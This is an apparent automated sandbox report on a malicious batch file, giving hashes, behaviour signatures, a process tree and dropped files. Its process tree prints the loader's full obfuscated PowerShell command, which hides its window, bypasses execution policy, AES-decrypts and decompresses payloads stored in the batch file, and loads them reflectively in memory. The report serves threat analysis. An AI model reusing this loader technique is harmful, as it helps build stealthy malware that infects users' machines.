Analysis

  • max time kernel
    137s
  • max time network
    138s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    21-05-2024 20:36

General

  • Target

    sxr-Uni.bat

  • Size

    1004KB

  • MD5

    87135909ef2fbb7168cd05d0e39fa129

  • SHA1

    1c2a864813a5cf5fb12a3e92f80c8ea90b5d7799

  • SHA256

    38050d3e9a2d09088d05a9a586ad93d139c84439ae995d42cbbaed70fdd77ea7

  • SHA512

    93475323429a7084902ba12d8ae8ba006de046dfcce62d7acd219f4ec856e561b3f1b036661a52de1950359a61dc1dd8fc52c8b3ea8e1756be04ae0a071ac547

  • SSDEEP

    24576:Aj9+DnG6YVMFMTnd9x6osRvWc2mjJRiW7+wjHRjX:NGppndjT6dxjX

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Modifies Internet Explorer settings 1 TTPs 37 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 13 IoCs
  • Suspicious use of SendNotifyMessage 8 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\sxr-Uni.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1736
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZuUSVdDzzqEQUY+YLsQ5Gj5wKfn0tqq012ohBylrVEE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vggS0zw77JyIF8H43aLbbQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GZkhM=New-Object System.IO.MemoryStream(,$param_var); $oEEbG=New-Object System.IO.MemoryStream; $cBLwn=New-Object System.IO.Compression.GZipStream($GZkhM, [IO.Compression.CompressionMode]::Decompress); $cBLwn.CopyTo($oEEbG); $cBLwn.Dispose(); $GZkhM.Dispose(); $oEEbG.Dispose(); $oEEbG.ToArray();}function execute_function($param_var,$param2_var){ $YTJuF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $BaFCg=$YTJuF.EntryPoint; $BaFCg.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\sxr-Uni.bat';$pjodI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\sxr-Uni.bat').Split([Environment]::NewLine);foreach ($SxOOI in $pjodI) { if ($SxOOI.StartsWith(':: ')) { $tIbAV=$SxOOI.Substring(3); break; }}$payloads_var=[string[]]$tIbAV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2864
  • C:\Program Files (x86)\Windows Media Player\wmplayer.exe
    "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Play -Embedding
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1192
    • C:\Program Files (x86)\Windows Media Player\setup_wm.exe
      "C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Play -Embedding
      2⤵
        PID:1416
    • C:\Program Files\VideoLAN\VLC\vlc.exe
      "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\UninstallPop.aiff"
      1⤵
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      PID:1684
    • C:\Program Files (x86)\Internet Explorer\iexplore.exe
      "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:488
      • C:\Program Files\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files\Internet Explorer\IEXPLORE.EXE" -nohome
        2⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:580
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:580 CREDAT:275457 /prefetch:2
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:1808

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      171105d23e22af720d7e1a6adfea2bf2

      SHA1

      9154ae2ed05a4024947432e09a60b64e8975a5a8

      SHA256

      4ff666cfa95cd002b4a25fef2b6504d4e9fa2062109c52f413bd48e0219ef60b

      SHA512

      da2af988136e12dd077f93a002539c089e3b42a71bbc0f6b864e0b2f3cf164051123abfacaf24ac3fdeaef502e5b8679d5ad23dc2ee41437e56957f339f5a241

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      5cae5dce8be2146c0abff87a0918286a

      SHA1

      8d7f38f6122561c9ec2b6b5a3f854001f233d57c

      SHA256

      35fb6ddde7114cbc5b94df0b338aab1fddfc40806fc44dd3a85c9285404e137b

      SHA512

      50b10e5e1765e8958bce55f76c812eec5b39786192394c28116590d6cf7a76d5f50885e7a4f1c96de886b59440426dd9df64f0ea21e7b12eabaef7162f2abae1

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      74733dd799988d2daca8e1b7d6b8eab2

      SHA1

      b73c90bf2e9beec709f4c5958162d42a9b4c1e0a

      SHA256

      b42853cb9aac1f2768469381e877c0447b7945acb6799a7563430f0473273d98

      SHA512

      468234a3f13bf294ab73d6ed60e3aa26035bd92ac135d411baddda65e366e3e714e00cef37977d5fcfeb3a01d11a2426b980418bc7bbcd603190b60588e0bc1b

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      8c4ea7a4743000cdd3183d26c0eaf947

      SHA1

      99e2adcb5ad34d3083d81771b4b122f262ca0c95

      SHA256

      fbb76da8f8055847f13ad9bcd30f6701164810e58d60ece4d413e6428c4244ed

      SHA512

      b764aa033ffdaebdcedebc0281f7e787eb6cd5419634ee59e7170ff56be2004ecdcea5b877ee7a0fd8fcd90a8f14dc8bbd425637a58f7535365f5527741d6c6d

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      46b2c6e84a4b3953504d4d48d8499d02

      SHA1

      31f1447952aff57f157283231d06745747a0fd21

      SHA256

      16fdcf16c8fb92f8153c6df402406cb56975fb74fe7f01ee9b53965ac5f63355

      SHA512

      1e604b0a36687f2cea56494b3ec16df75a00092e063a8bc0b17d7647531d2518da118b34b66c8f8cab25fdb9315ba40248b3b2bbd0fc0342e99f715bfd8765f4

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      5f7e5858889f0c535e4620baf37e90ec

      SHA1

      974fa81a5663503ee9d18fb93772d49e8b4e4d48

      SHA256

      72f68db498b660a9deea5b5e98d1b74c2f69432c9a20e25bc1911fb818ce75c2

      SHA512

      6702d94df44e858069ed7268467d09aef6beee49cabcb9d9778946288ca50d94d473745e1efb396d7fcee2fef9e83c9be4636dc60ec70f379776df69758be4ea

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      6231f2e9fa7cc1ed00c7d938fd4b402b

      SHA1

      f3c9449ff842359ec94894d75c49e4f5c7b312da

      SHA256

      65849b61c28b5e11dfb73597c41210d1ce43000b06642d3baecccc74eb462282

      SHA512

      47181a273aebb4189cb2b680f2a9daeb9adfd8430b713923febcc5237b0bbd379f97cbe9383594b773deae1bf13d8b4a8e4a73c9d428bcecc382e975a7c44961

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      a2de1a377c856a66a2c9a38474f8539c

      SHA1

      b4c56d1cd7b2aabb51cf0ff9e37e95118c542423

      SHA256

      4fbe9fc0bd3a157e5d44b210fb1a75e44e24a61fb5d1c39acfd1012ee2d7f6fc

      SHA512

      2392485995428cde6c36c29ee50dd4905cceeaf412096d04dd5b25a8219b06d65f38ad814c13a2cd7bbbcad2ebb14c391ea95134ec8aebf7eaf17ffe4c512b59

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      f9a53282df825db508f780b78fbf7852

      SHA1

      246a384b888303fe297fee3c7427e8e12e8c8ceb

      SHA256

      d86e4342ddcd6c0509cf22aa98793b7553fb20690039955a9a278d0ac0c79354

      SHA512

      35d91eac491dede963dee9d1dd4c3b1e2726116305b5c949b9d9940b0d2d8d6b16875f04d6ae67380989157643c027bc34b4c093046f30eab7cc584dde07b2a9

    • C:\Users\Admin\AppData\Local\Temp\CabBEA1.tmp
      Filesize

      68KB

      MD5

      29f65ba8e88c063813cc50a4ea544e93

      SHA1

      05a7040d5c127e68c25d81cc51271ffb8bef3568

      SHA256

      1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

      SHA512

      e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

    • C:\Users\Admin\AppData\Local\Temp\TarBF01.tmp
      Filesize

      177KB

      MD5

      435a9ac180383f9fa094131b173a2f7b

      SHA1

      76944ea657a9db94f9a4bef38f88c46ed4166983

      SHA256

      67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

      SHA512

      1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

    • C:\Users\Admin\AppData\Local\Temp\tmp78381.WMC\allservices.xml
      Filesize

      546B

      MD5

      df03e65b8e082f24dab09c57bc9c6241

      SHA1

      6b0dacbf38744c9a381830e6a5dc4c71bd7cedbf

      SHA256

      155b9c588061c71832af329fafa5678835d9153b8fbb7592195ae953d0c455ba

      SHA512

      ef1cc8d27fbc5da5daab854c933d3914b84ee539d4d2f0126dc1a04a830c5599e39a923c80257653638b1b99b0073a7174cc164be5887181730883c752ba2f99

    • memory/1684-36-0x000007FEF4C10000-0x000007FEF5CC0000-memory.dmp
      Filesize

      16.7MB

    • memory/1684-35-0x000007FEF6650000-0x000007FEF6906000-memory.dmp
      Filesize

      2.7MB

    • memory/1684-34-0x000007FEF77B0000-0x000007FEF77E4000-memory.dmp
      Filesize

      208KB

    • memory/1684-33-0x000000013FE30000-0x000000013FF28000-memory.dmp
      Filesize

      992KB

    • memory/2864-2-0x00000000743D1000-0x00000000743D2000-memory.dmp
      Filesize

      4KB

    • memory/2864-7-0x00000000743D0000-0x000000007497B000-memory.dmp
      Filesize

      5.7MB

    • memory/2864-4-0x00000000743D0000-0x000000007497B000-memory.dmp
      Filesize

      5.7MB

    • memory/2864-5-0x00000000743D0000-0x000000007497B000-memory.dmp
      Filesize

      5.7MB

    • memory/2864-6-0x00000000743D0000-0x000000007497B000-memory.dmp
      Filesize

      5.7MB

    • memory/2864-3-0x00000000743D0000-0x000000007497B000-memory.dmp
      Filesize

      5.7MB